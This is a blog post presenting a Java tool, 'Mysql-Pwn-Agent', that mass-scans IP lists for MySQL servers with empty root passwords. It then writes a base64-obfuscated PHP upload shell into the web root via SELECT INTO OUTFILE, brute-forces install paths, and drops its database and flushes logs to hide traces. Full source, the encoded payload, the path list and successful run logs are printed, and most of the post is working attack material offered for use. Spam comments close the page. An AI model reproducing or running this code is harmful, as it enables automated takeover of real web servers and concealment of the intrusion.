Comments

Saturday, February 9, 2013

Mysql-Pwn-Agent Beta

Posted by at Saturday, February 09, 2013 Read our previous post

 

Hello and Good morning to all readers. I get up quite early today and in fact I slept very late last night. argh..

But im done with Mysql-Pwn-Agent Beta.

Mysql Pwn Agent is a Mysql + Any Win Http Server Auto Exploite,i use (XAMPP) for testings.

Here is my simple Poc=Proof of Concept

.           Paint wtf Zwinkerndes Smiley

 

Unbenannt

 

After some days playing with java jdbc and Xampp Mysql and Apache.

I finished writing the exploit thanks to Yeohwa for some hints.

Here some Screenshots.

We need some Test-Server Start Xampp + Apache Web Server + Mysql Database

 

xampp

 

Get the Exploit and add some IP´s to scan.txt.Add your php shell code base64 encode to shell.txt Start the Exploit.You can use php/reverse/metapreter/ from metasploit to get some reverse shell but it suckz on my online check shell class because phpmetasploit reverse shell never stop loading.Better use any php-shell  or my simple upload script.

 

input

The POC-Exploit:

 

exploit

 

Exploit Output if she fail.Creating Random Database+Tables all the time.She use dir.txt to brute the htdocs root dir from Apache to upload the shell and check if shell online.

 

#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...localhost
Creating database rcdmiwb
Creating Table rcdmiwb
rcdmiwb Table created successfully...
rcdmiwb Connecting to database rcdmiwb Again...
Insert Shell Into Table rcdmiwb...
Creating outfile to hdd...
SQLState: HY000
Error Code: 1
Message: Can't create/write to file 'C:\mysql-admin\rcdmiwb.php' (Errcode: 2)
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...127.0.0.1
Creating database bffatwe
Creating Table bffatwe
bffatwe Table created successfully...
bffatwe Connecting to database bffatwe Again...
Insert Shell Into Table bffatwe...
Creating outfile to hdd...
SQLState: HY000
Error Code: 1
Message: Can't create/write to file 'C:\mysql-admin\bffatwe.php' (Errcode: 2)
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################






Exploit Output if she WIN.



#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...localhost
Creating database tdduvjs
Creating Table tdduvjs
tdduvjs Table created successfully...
tdduvjs Connecting to database tdduvjs Again...
Insert Shell Into Table tdduvjs...
Creating outfile to hdd...
Upload /xampp/htdocs/tdduvjs.php Done...
Successfully Exploit Done ...
Connecting to database tdduvjs Again...
Drop Database tdduvjs...
Successfully Dropped tdduvjs Table ...
Flush logs ...
Successfully FLUSH Logs Done ...
#######################################################################
#######################################################################
By Security-is-just-an-illusion.blogspot.de
Your Shell : http://localhost/tdduvjs.php
#######################################################################
#######################################################################
Goodbye by http://security-is-just-an-illusion.blogspot.de!
#######################################################################
###########################by cr4shyyy#################################
#######################################################################
Connecting to database...127.0.0.1
Creating database memaarx
Creating Table memaarx
memaarx Table created successfully...
memaarx Connecting to database memaarx Again...
Insert Shell Into Table memaarx...
Creating outfile to hdd...
Upload /xampp/htdocs/memaarx.php Done...
Successfully Exploit Done ...
Connecting to database memaarx Again...
Drop Database memaarx...
Successfully Dropped memaarx Table ...
Flush logs ...
Successfully FLUSH Logs Done ...
#######################################################################
#######################################################################
By Security-is-just-an-illusion.blogspot.de
Your Shell : http://127.0.0.1/memaarx.php
#######################################################################
#######################################################################
Goodbye by http://security-is-just-an-illusion.blogspot.de!


Now she find the root doc and we WIN and got your shells ready Zwinkerndes Smiley



Look into results.txt there are the saved shells.



#######################################################################
By http://Security-is-just-an-illusion.blogspot.de
Your Shell : http://localhost/tdduvjs.php
Shell Date: 09.02.2013 12:15
#######################################################################

#######################################################################
By http://Security-is-just-an-illusion.blogspot.de
Your Shell : http://127.0.0.1/memaarx.php
Shell Date: 09.02.2013 12:15
#######################################################################


The Result with base64 encode Upload Script :



uploadscript



YeahhhHhhh we got a upload script to upload your shell.Nothing new … Zwinkerndes Smiley



Have pfun



main.java



package sploit;

import java.io.BufferedReader;
import java.io.BufferedWriter;
import java.io.DataInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileWriter;
import java.io.IOException;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.sql.Connection;
import java.sql.Date;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.sql.Statement;
import java.text.DateFormat;
import java.text.SimpleDateFormat;
import java.util.GregorianCalendar;
import java.util.Random;
import java.util.Scanner;

import sploit.checkshell;

public class main {
// JDBC driver name and database URL
static String output = null;
static String outputshell = null;

// Database credentials
static final String USER = "root";
static final String PASS = "";

/**
* @param args
* @throws IOException
*/



public static void main(String[] args) throws IOException {
System.out.println(" Mysql-Pwn-Agent-Exploit Beta 1 ");
System.out.println("_________________________________");
System.out.println("|.--------_--_------------_--__--.|");
System.out.println("|| Security-is-just-an-Illusion||");
System.out.println(";;`,_ by cr4shyyy __ ,:|");
System.out.println("((_(-,-----------.-.----------.-.)`)");
System.out.println("__ ) ,' `. _/");
System.out.println(": : |_________| : :");
System.out.println("|-'| ,'-.-.--.-.`. |`-|");
System.out.println("|_.| (( (* )(* ))) |._|");
System.out.println("| | `.-`-'--`-'.' | |");
System.out.println("|-'| | ,-.-.-. | |._|");
System.out.println("| | |(|-|-|-|)| | |");
System.out.println(":,': |_`-'-'-'_| ;`.;");
System.out.println(" ,' `. /._/");
System.out.println(" `._ ________________,' /");
System.out.println(" : ___________ : ,'");
System.out.println(" `.| | | | |,'");
System.out.println(" `.| | g0tr00t ? | | |");
System.out.println(" | | | |");
System.out.println("Hello nobody. Tonight we have a very special g33k Presentation.");
System.out.println("So, kick back and stretch your sack.");
System.out.println(" ");
System.out.println(" +++The Mentor+++ ");
System.out.println("We explore... and you call us criminals.");
System.out.println("We seek after knowledge... and you call us criminals.");
System.out.println("We exist without skin color, without nationality, without religious bias... and you call us criminals.");
System.out.println("You build atomic bombs, you wage wars, you murder, cheat,");
System.out.println("and lie to us and try to make us believe it's for our own good, yet we're the criminals.");

System.out.print("Press 2x Enter to fire ...");
Scanner sc = new Scanner(System.in);
while(!sc.nextLine().equals(""));
sc.nextLine();
sc.close();

// Open the file that is the first
// command line parameter
FileInputStream dirstream10 = new FileInputStream("shell.txt");
// Get the object of DataInputStream
DataInputStream dir0 = new DataInputStream(dirstream10);
BufferedReader b10 = new BufferedReader(new InputStreamReader(dir0));
String strLine10;
//Read File Line By Line

//Read File Line By Line
while ((strLine10 = b10.readLine()) != null) {
// Print the content on the console
String shell = strLine10;
//System.out.println (shell);

try{
// Open the file that is the first
// command line parameter
FileInputStream dirstream1 = new FileInputStream("dir.txt");
// Get the object of DataInputStream
DataInputStream dir = new DataInputStream(dirstream1);
BufferedReader b1 = new BufferedReader(new InputStreamReader(dir));
String strLine1;
//Read File Line By Line

//Read File Line By Line
while ((strLine1 = b1.readLine()) != null) {
// Print the content on the console
String dirbrute = strLine1;
//System.out.println (strLine1);


// Open the file that is the first
// command line parameter
FileInputStream fstream = new FileInputStream("scan.txt");
// Get the object of DataInputStream
DataInputStream in = new DataInputStream(fstream);
BufferedReader br = new BufferedReader(new InputStreamReader(in));
String strLine;


while ((strLine = br.readLine()) != null) {
// Print the content on the console
//System.out.println (strLine);

//Main Connect to db
Connection conn = null;
Statement stmt = null;
try{
//STEP 1: Init Random
Random ran = new Random();
int top = 6;
char data = ' ';
String dat = "";

for (int i=0; i<=top; i++) {
data = (char)(ran.nextInt(25)+97);
dat = data + dat;
}

//STEP 2: Register JDBC driver
Class.forName("com.mysql.jdbc.Driver");
final String DB_URL = "jdbc:mysql://"+strLine+"/";
final String DB_URL3 = "jdbc:mysql://"+strLine+"/"+dat+"";
final String DB_URL2 = "jdbc:mysql://"+strLine+"/"+dat+"";


//STEP 3: Open a connection
System.out.println("#######################################################################");
System.out.println("###########################by cr4shyyy#################################");
System.out.println("#######################################################################");
System.out.println("Connecting to database..."+strLine);

conn = DriverManager.getConnection(DB_URL, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Creating database "+dat);
stmt = conn.createStatement();
String sql = "CREATE DATABASE "+dat;
stmt.executeUpdate(sql);
//System.out.println("Done...");

System.out.println("Creating Table "+dat);
String sql2 = "CREATE TABLE `"+dat+"`.`user_upload` (`track2` VARCHAR( 55060 ) NOT NULL) ENGINE = MYISAM ;";
stmt.executeUpdate(sql2);
//System.out.println("Done...");
System.out.println(dat+" Table created successfully...");

//STEP 2: Register JDBC driver
Class.forName("com.mysql.jdbc.Driver");

//STEP 3: Open a connection
System.out.println(dat+" Connecting to database "+dat+" Again...");
conn = DriverManager.getConnection(DB_URL2, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Insert Shell Into Table "+dat+"...");
stmt = conn.createStatement();
String sql0 = "INSERT INTO user_upload " + "VALUES ('<?php sleep(10);" +shell+ "" + " ?>')";
stmt.executeUpdate(sql0);
//System.out.println("Done...");



System.out.println("Creating outfile to hdd...");
String sql4 = "select * into outfile 'C:"+""+dirbrute+""+dat.toString() +".php'" + "from user_upload";

stmt.executeQuery(sql4);

System.out.println("Upload "+strLine1+""+ dat +".php Done...");
System.out.println("Successfully Exploit Done ...");


//STEP 3: Open a connection
System.out.println("Connecting to database "+dat+" Again...");
conn = DriverManager.getConnection(DB_URL3, USER, PASS);
//System.out.println("Done...");

//STEP 4: Execute a query
System.out.println("Drop Database "+dat+"...");
stmt = conn.createStatement();
String sql01 = "DROP DATABASE "+dat;
stmt.executeUpdate(sql01);
//System.out.println("Done...");
System.out.println("Successfully Dropped "+dat+" Table ...");

System.out.println("Flush logs ...");
stmt = conn.createStatement();
String sql1 = "FLUSH LOGS";
stmt.executeUpdate(sql1);
//System.out.println("Done...");
System.out.println("Successfully FLUSH Logs Done ...");
System.out.println("#######################################################################");
System.out.println("#######################################################################");
if ((checkshell.exists("http://"+strLine+"/"+""+dat+".php")) == true) {
System.out.println("By Security-is-just-an-illusion.blogspot.de");
System.out.println("Your Shell : "+"http://"+strLine+""+"/"+dat+".php");
//System.out.println(checkshell.exists("http://"+strLine+"/"+""+dat+".php"));
FileWriter writer;
File file;
file = new File("results.txt");
writer = new FileWriter(file ,true);
writer.write(System.getProperty("line.separator"));
writer.write(System.getProperty("line.separator"));
writer.write("#######################################################################");
writer.write(System.getProperty("line.separator"));
writer.write("By http://Security-is-just-an-illusion.blogspot.de");
writer.write(System.getProperty("line.separator"));
writer.write("Your Shell : "+"http://"+strLine+""+"/"+dat+".php");
writer.write(System.getProperty("line.separator"));
GregorianCalendar now=new GregorianCalendar();
DateFormat df=DateFormat.getDateInstance(DateFormat.MEDIUM);
writer.write("Shell Date: "+df.format(now.getTime())+" ");
//System.out.println("Shell Date: "+df.format(now.getTime())+" ");
df=DateFormat.getTimeInstance(DateFormat.SHORT);
//System.out.println(df.format(now.getTime()));
writer.write(df.format(now.getTime()));
writer.write(System.getProperty("line.separator"));
writer.write("#######################################################################");
writer.flush();
writer.close();
}

else{
System.out.println("Shell_Exploit-Negativ.");
}

System.out.println("#######################################################################");
System.out.println("#######################################################################");

}catch(SQLException se){
//Handle errors for JDBC
System.err.println("SQLState: " +
((SQLException)se).getSQLState());
System.err.println("Error Code: " +
((SQLException)se).getErrorCode());
System.err.println("Message: " + se.getMessage());
}catch(Exception e){
//Handle errors for Class.forName
e.printStackTrace();
}finally{
//finally block used to close resources
try{
if(stmt!=null)
stmt.close();
}catch(SQLException se2){
}// nothing we can do
try{
if(conn!=null)
conn.close();
}catch(SQLException se){
System.out.println("SQL Fehler "+se.getMessage());
}//end finally try
}//end try
System.out.println("Goodbye by http://security-is-just-an-illusion.blogspot.de!");
//END

}
}
//Close the input stream
dir.close();
}catch (Exception e){//Catch exception if any
System.err.println("Error: " + e.getMessage());
}
}
}

private static boolean blub(String string) {
// TODO Auto-generated method stub
return false;
}
}


Checkshell.java






package sploit;
import java.net.*;

public class checkshell {

public static void mainshellcheck(String s[]) {
/*
output :
true
false
*/
}

public static boolean exists(String URLName){
try {
HttpURLConnection.setFollowRedirects(false);
// note : you may also need
// HttpURLConnection.setInstanceFollowRedirects(false)
HttpURLConnection con =
(HttpURLConnection) new URL(URLName).openConnection();
con.setRequestMethod("HEAD");
return (con.getResponseCode() == HttpURLConnection.HTTP_OK);
}

catch (Exception e) {
e.printStackTrace();
return false;
}
}
}



shell.txt




eval(base64_decode("ZnVuY3Rpb24gZGlzcGxheV91cGxvYWRfZm9ybSgpDQp7DQplY2hvIDw8PERJU1BMQVlfVVBMT0FEX0ZPUk0NCg0KICAgIDxodG1sPg0KICAgIDxoZWFkPg0KICAgIDx0aXRsZT5VcGxvYWQgU2hlbGwgYnkgU2VjdXJpdHktaXMtanVzdC1hbi1pbGx1c2lvbi5ibG9nc3BvdC5kZTwvdGl0bGU+DQogICAgPHN0eWxlIHR5cGU9InRleHQvY3NzIiBtZWRpYT0ic2NyZWVuIj4NCiAgICAgICAgPCEtLQ0KICAgICAgICBodG1sIGJvZHkNCiAgICAgICAge2JhY2tncm91bmQ6IzE0RkYwMDsgZm9udDogNzYlLzEuNWVtIGFyaWFsLCBoZWx2ZXRpY2EsIHNhbnMtc2VyaWY7IGNvbG9yOiNGRjAwMzA7fQ0KICAgICAgIDxib2R5IGJnY29sb3IgPSAiYmxhY2siPg0KICAgICAgICBpbnB1dA0KICAgICAgICB7Y29sb3I6I0ZGMDAzMDt9DQogICAgICAgIC0tPg0KICAgIDwvc3R5bGU+DQogICAgPC9oZWFkPg0KICAgIA0KICAgIDxib2R5Pg0KDQogICAgPGZvcm0gbWV0aG9kPSJwb3N0IiBhY3Rpb249InskX1NFUlZFUlsnUEhQX1NFTEYnXX0iIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiPg0KICAgIA0KICAgIDxwPkZpbGUgVXBsb2FkIGJ5ICAgKmNyNHNoeXkqICAgZnJvbSA8YSBocmVmPSJodHRwOi8vd3d3LlNlY3VyaXR5LWlzLWp1c3QtYW4taWxsdXNpb24uYmxvZ3Nwb3QuZGUiPlNlY3VyaXR5LWlzLWp1c3QtYW4taWxsdXNpb24uYmxvZ3Nwb3QuZGU8L2E+IDxiciAvPg0KICAgIDxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJteWZpbGUiIHRhYmluZGV4PSIxIiAvPjwvcD4NCg0KICAgIDxwPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImV4ZWN1dGUiIHZhbHVlPSIxIiAvPjwvcD4NCg0KICAgIDxwPjxpbnB1dCB0eXBlPSJzdWJtaXQiIHZhbHVlPSJVcGxvYWQgRmlsZSIgdGFiaW5kZXg9IjIiIC8+DQoNCiAgICA8L2Zvcm0+DQoNCiAgICA8L2JvZHk+DQogICAgPC9odG1sPg0KDQpESVNQTEFZX1VQTE9BRF9GT1JNOw0KDQp9DQoNCi8vIEZpbGUgVXBsb2FkICoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCg0KZnVuY3Rpb24gZXhlY3V0ZV91cGxvYWQoKQ0Kew0KDQogICAgLy8gcm9vdCBwYXRoDQogICAgJHBhdGggPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddOw0KDQogICAgLy8gdXBsb2FkIGRpcmVjdG9yeS4gcGF0aCB3aWxsIG9yaWdpbmF0ZSBmcm9tIHJvb3QuDQogICAgJGRpcm5hbWUgPSAnLyc7DQoNCiAgICAvLyBwZXJtaXNzaW9uIHNldHRpbmdzIGZvciBuZXdseSBjcmVhdGVkIGZvbGRlcnMNCiAgICAkY2htb2QgPSAwNzU1Ow0KDQogICAgLy8gY3JlYXRlIGZpbGUgdmFycyB0byBtYWtlIHRoaW5ncyBlYXNpZXIgdG8gcmVhZC4NCiAgICAkZmlsZW5hbWUgPSAkX0ZJTEVTWydteWZpbGUnXVsnbmFtZSddOw0KICAgICRmaWxlc2l6ZSA9ICRfRklMRVNbJ215ZmlsZSddWydzaXplJ107DQogICAgJGZpbGV0eXBlID0gJF9GSUxFU1snbXlmaWxlJ11bJ3R5cGUnXTsNCiAgICAkZmlsZV90bXAgPSAkX0ZJTEVTWydteWZpbGUnXVsndG1wX25hbWUnXTsNCiAgICAkZmlsZV9lcnIgPSAkX0ZJTEVTWydteWZpbGUnXVsnZXJyb3InXTsNCiAgICAkZmlsZV9leHQgPSBzdHJyY2hyKCRmaWxlbmFtZSwgJy4nKTsNCg0KICAgIC8vIGNoZWNrIGlmIHVzZXIgYWN0dWFsbHkgcHV0IHNvbWV0aGluZyBpbiB0aGUgZmlsZSBpbnB1dCBmaWVsZC4NCiAgICBpZiAoKCRmaWxlX2VyciA9PSAwKSAmJiAoJGZpbGVzaXplICE9IDApKQ0KICAgIHsNCiAgICAgICAgLy8gQ2hlY2sgZXh0ZW5zaW9uLg0KICAgICAgICBpZiAoISRmaWxlX2V4dCkNCiAgICAgICAgew0KICAgICAgICAgICAgdW5saW5rKCRmaWxlX3RtcCk7DQogICAgICAgICAgICBkaWUoJ0ZpbGUgbXVzdCBoYXZlIGFuIGV4dGVuc2lvbi4nKTsNCiAgICAgICAgfQ0KDQogICAgICAgIC8vIGV4dHJhIGNoZWNrIHRvIHByZXZlbnQgZmlsZSBhdHRhY2tzLg0KICAgICAgICBpZiAoaXNfdXBsb2FkZWRfZmlsZSgkZmlsZV90bXApKQ0KICAgICAgICB7DQogICAgICAgICAgICAvKg0KICAgICAgICAgICAgKiBjaGVjayBpZiB0aGUgZGlyZWN0b3J5IGV4aXN0cw0KICAgICAgICAgICAgKiBpZiBpdCBkb2VzbnQgZXhpc3QsIG1ha2UgdGhlIGRpcmVjdG9yeQ0KICAgICAgICAgICAgKi8NCiAgICAgICAgICAgICRkaXIgPSAkcGF0aCAuICRkaXJuYW1lOw0KDQogICAgICAgICAgICBpZiAoIWlzX2RpcigkZGlyKSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAkZGlyID0gZXhwbG9kZSgnLycsICRkaXJuYW1lKTsNCg0KICAgICAgICAgICAgICAgIGZvcmVhY2ggKCRkaXIgYXMgJHN1Yl9kaXIpDQogICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAkcGF0aCAuPSAnLycgLiAkc3ViX2RpcjsNCiAgICAgICAgICAgICAgICAgICAgaWYgKCFpc19kaXIoJHBhdGgpKQ0KICAgICAgICAgICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgICAgICAgICBpZiAoIW1rZGlyKCRwYXRoLCAkY2htb2QpKQ0KICAgICAgICAgICAgICAgICAgICAgICAgew0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIHVubGluaygkZmlsZV90bXApOw0KICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRpZSgnPHN0cm9uZz5FcnJvcjo8L3N0cm9uZz4gRGlyZWN0b3J5IGRvZXMgbm90IGV4aXN0IGFuZCB3YXMgdW5hYmxlIHRvIGJlIGNyZWF0ZWQuJyk7DQogICAgICAgICAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICAgICAgICAgIH0NCiAgICAgICAgICAgICAgICB9DQogICAgICAgICAgICB9DQoNCiAgICAgICAgICAgIC8qDQogICAgICAgICAgICAqIGNvcHkgdGhlIGZpbGUgZnJvbSB0aGUgdGVtcG9yYXJ5IHVwbG9hZCBkaXJlY3RvcnkNCiAgICAgICAgICAgICogdG8gaXRzIGZpbmFsIGRldGluYXRpb24uDQogICAgICAgICAgICAqLw0KICAgICAgICAgICAgaWYgKEBtb3ZlX3VwbG9hZGVkX2ZpbGUoJGZpbGVfdG1wLCAkZGlyIC4gJy8nIC4gJGZpbGVuYW1lKSkNCiAgICAgICAgICAgIHsNCiAgICAgICAgICAgICAgICAvLyBzdWNjZXNzIQ0KICAgICAgICAgICAgICAgIGVjaG8gIg0KICAgICAgICAgICAgICAgIDxwPlN1Y2Nlc3MhPC9wPg0KICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+VmlldyBGaWxlOjwvc3Ryb25nPiA8YSBocmVmPSBcIi8kZmlsZW5hbWVcIj4kZmlsZW5hbWU8L2E+PC9wPg0KICAgICAgICAgICAgICAgICI7DQogICAgICAgICAgICB9DQogICAgICAgICAgICBlbHNlDQogICAgICAgICAgICB7DQogICAgICAgICAgICAgICAgLy8gZXJyb3IgbW92aW5nIGZpbGUuIGNoZWNrIGZpbGUgcGVybWlzc2lvbnMuDQogICAgICAgICAgICAgICAgdW5saW5rKCRmaWxlX3RtcCk7DQogICAgICAgICAgICAgICAgZWNobyAnPHN0cm9uZz5FcnJvcjo8L3N0cm9uZz4gVW5hYmxlIHRvIG1vdmUgZmlsZSB0byBkZXNpZ25hdGVkIGRpcmVjdG9yeS4nOw0KICAgICAgICAgICAgfQ0KICAgICAgICB9DQogICAgICAgIGVsc2UNCiAgICAgICAgew0KICAgICAgICAgICAgLy8gZmlsZSBzZWVtcyBzdXNwaWNpb3VzLi4uIGRlbGV0ZSBmaWxlIGFuZCBlcnJvciBvdXQuDQogICAgICAgICAgICB1bmxpbmsoJGZpbGVfdG1wKTsNCiAgICAgICAgICAgIGVjaG8gJzxzdHJvbmc+RXJyb3I6PC9zdHJvbmc+IEZpbGUgZG9lcyBub3QgYXBwZWFyIHRvIGJlIGEgdmFsaWQgdXBsb2FkLiBDb3VsZCBiZSBhIGZpbGUgYXR0YWNrLic7DQogICAgICAgIH0NCiAgICB9DQogICAgZWxzZQ0KICAgIHsNCiAgICAgICAgLy8gS2lsbCB0ZW1wIGZpbGUsIGlmIGFueSwgYW5kIGRpc3BsYXkgZXJyb3IuDQogICAgICAgIGlmICgkZmlsZV90bXAgIT0gJycpDQogICAgICAgIHsNCiAgICAgICAgICAgIHVubGluaygkZmlsZV90bXApOw0KICAgICAgICB9DQoNCiAgICAgICAgc3dpdGNoICgkZmlsZV9lcnIpDQogICAgICAgIHsNCiAgICAgICAgICAgIGNhc2UgJzAnOg0KICAgICAgICAgICAgICAgIGVjaG8gJ1RoYXQgaXMgbm90IGEgdmFsaWQgZmlsZS4gMCBieXRlIGxlbmd0aC4nOw0KICAgICAgICAgICAgICAgIGJyZWFrOw0KDQogICAgICAgICAgICBjYXNlICcxJzoNCiAgICAgICAgICAgICAgICBlY2hvICdUaGlzIGZpbGUsIGF0ICcgLiAkZmlsZXNpemUgLiAnIGJ5dGVzLCBleGNlZWRzIHRoZSBtYXhpbXVtIGFsbG93ZWQgZmlsZSBzaXplIGFzIHNldCBpbiA8ZW0+cGhwLmluaTwvZW0+LiAnLg0KICAgICAgICAgICAgICAgICdQbGVhc2UgY29udGFjdCB5b3VyIHN5c3RlbSBhZG1pbi4nOw0KICAgICAgICAgICAgICAgIGJyZWFrOw0KDQogICAgICAgICAgICBjYXNlICcyJzoNCiAgICAgICAgICAgICAgICBlY2hvICdUaGlzIGZpbGUgZXhjZWVkcyB0aGUgbWF4aW11bSBmaWxlIHNpemUgc3BlY2lmaWVkIGluIHlvdXIgSFRNTCBmb3JtLic7DQogICAgICAgICAgICAgICAgYnJlYWs7DQoNCiAgICAgICAgICAgIGNhc2UgJzMnOg0KICAgICAgICAgICAgICAgIGVjaG8gJ0ZpbGUgd2FzIG9ubHkgcGFydGlhbGx5IHVwbG9hZGVkLiBUaGlzIGNvdWxkIGJlIHRoZSByZXN1bHQgb2YgeW91ciBjb25uZWN0aW9uICcuDQogICAgICAgICAgICAgICAgJ2JlaW5nIGRyb3BwZWQgaW4gdGhlIG1pZGRsZSBvZiB0aGUgdXBsb2FkLic7DQoNCiAgICAgICAgICAgIGNhc2UgJzQnOg0KICAgICAgICAgICAgICAgIGVjaG8gJ1lvdSBkaWQgbm90IHVwbG9hZCBhbnl0aGluZy4uLiBQbGVhc2UgZ28gYmFjayBhbmQgc2VsZWN0IGEgZmlsZSB0byB1cGxvYWQuJzsNCiAgICAgICAgICAgICAgICBicmVhazsNCiAgICAgICAgfQ0KICAgIH0NCn0NCg0KLy8gTG9naWMgQ29kZSAqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKg0KDQppZiAoaXNzZXQoJF9QT1NUWydleGVjdXRlJ10pKQ0Kew0KICAgIGV4ZWN1dGVfdXBsb2FkKCk7DQp9DQplbHNlDQp7DQogICAgZGlzcGxheV91cGxvYWRfZm9ybSgpOw0KfQ==")); 



dir.txt



/htdocs/
/phpmyadmin/
/phpMyAdmin/
/PMA/
/pma/
/admin/
/dbadmin/
/mysql/
/myadmin/
/phpmyadmin2/
/phpMyAdmin2/
/phpMyAdmin-2/
/php-my-admin/
/phpMyAdmin-2.2.3/
/phpMyAdmin-2.2.6/
/phpMyAdmin-2.5.1/
/phpMyAdmin-2.5.4/
/phpMyAdmin-2.5.5-rc1/
/phpMyAdmin-2.5.5-rc2/
/phpMyAdmin-2.5.5/
/phpMyAdmin-2.5.5-pl1/
/phpMyAdmin-2.5.6-rc1/
/phpMyAdmin-2.5.6-rc2/
/phpMyAdmin-2.5.6/
/phpMyAdmin-2.5.7/
/phpMyAdmin-2.5.7-pl1/
/phpMyAdmin-2.6.0-alpha/
/phpMyAdmin-2.6.0-alpha2/
/phpMyAdmin-2.6.0-beta1/
/phpMyAdmin-2.6.0-beta2/
/phpMyAdmin-2.6.0-rc1/
/phpMyAdmin-2.6.0-rc2/
/phpMyAdmin-2.6.0-rc3/
/phpMyAdmin-2.6.0/
/phpMyAdmin-2.6.0-pl1/
/phpMyAdmin-2.6.0-pl2/
/phpMyAdmin-2.6.0-pl3/
/phpMyAdmin-2.6.1-rc1/
/phpMyAdmin-2.6.1-rc2/
/phpMyAdmin-2.6.1/
/phpMyAdmin-2.6.1-pl1/
/phpMyAdmin-2.6.1-pl2/
/phpMyAdmin-2.6.1-pl3/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2-beta1/
/phpMyAdmin-2.6.2-rc1/
/phpMyAdmin-2.6.2/
/phpMyAdmin-2.6.2-pl1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-rc1/
/phpMyAdmin-2.6.3/
/phpMyAdmin-2.6.3-pl1/
/phpMyAdmin-2.6.4-rc1/
/phpMyAdmin-2.6.4-pl1/
/phpMyAdmin-2.6.4-pl2/
/phpMyAdmin-2.6.4-pl3/
/phpMyAdmin-2.6.4-pl4/
/phpMyAdmin-2.6.4/
/phpMyAdmin-2.7.0-beta1/
/phpMyAdmin-2.7.0-rc1/
/phpMyAdmin-2.7.0-pl1/
/phpMyAdmin-2.7.0-pl2/
/phpMyAdmin-2.7.0/
/phpMyAdmin-2.8.0-beta1/
/phpMyAdmin-2.8.0-rc1/
/phpMyAdmin-2.8.0-rc2/
/phpMyAdmin-2.8.0/
/phpMyAdmin-2.8.0.1/
/phpMyAdmin-2.8.0.2/
/phpMyAdmin-2.8.0.3/
/phpMyAdmin-2.8.0.4/
/phpMyAdmin-2.8.1-rc1/
/phpMyAdmin-2.8.1/
/phpMyAdmin-2.8.2/
/sqlmanager/
/mysqlmanager/
/p/m/a/
/PMA2005/
/pma2005/
/phpmanager/
/php-myadmin/
/phpmy-admin/
/webadmin/
/sqlweb/
/websql/
/webdb/
/mysqladmin/
/mysql-admin/
/xampp/htdocs/
/APMServ5.2.6/www/htdocs/
/www/htdocs/




Use it for Personal use or study purposes.

4 comments:

  1. Did you ever try to maximize your free bitcoin claims by using a BITCOIN FAUCET ROTATOR?

    ReplyDelete
  2. If you want your ex-girlfriend or ex-boyfriend to come crawling back to you on their knees (no matter why you broke up) you got to watch this video
    right away...

    (VIDEO) Have your ex CRAWLING back to you...?

    ReplyDelete
  3. If you're looking to buy bitcoins online, PAXFUL is the best source for bitcoins as it allows buying bitcoins by 100's of payment methods, such as MoneyGram, Western Union, PayPal, Credit Card and even exchanging your gift cards for bitcoins.

    ReplyDelete
  4. BlueHost is ultimately the best web-hosting provider for any hosting services you might require.

    ReplyDelete

[#] iNFO [#]

All the information provided on this site is for educational purposes only.
 
The site and it's author is in no way responsible for any misuse of the information.
©2012 Security is just an Illusion is powered by Blogger - Template designed by Stramaxon - Best SEO Template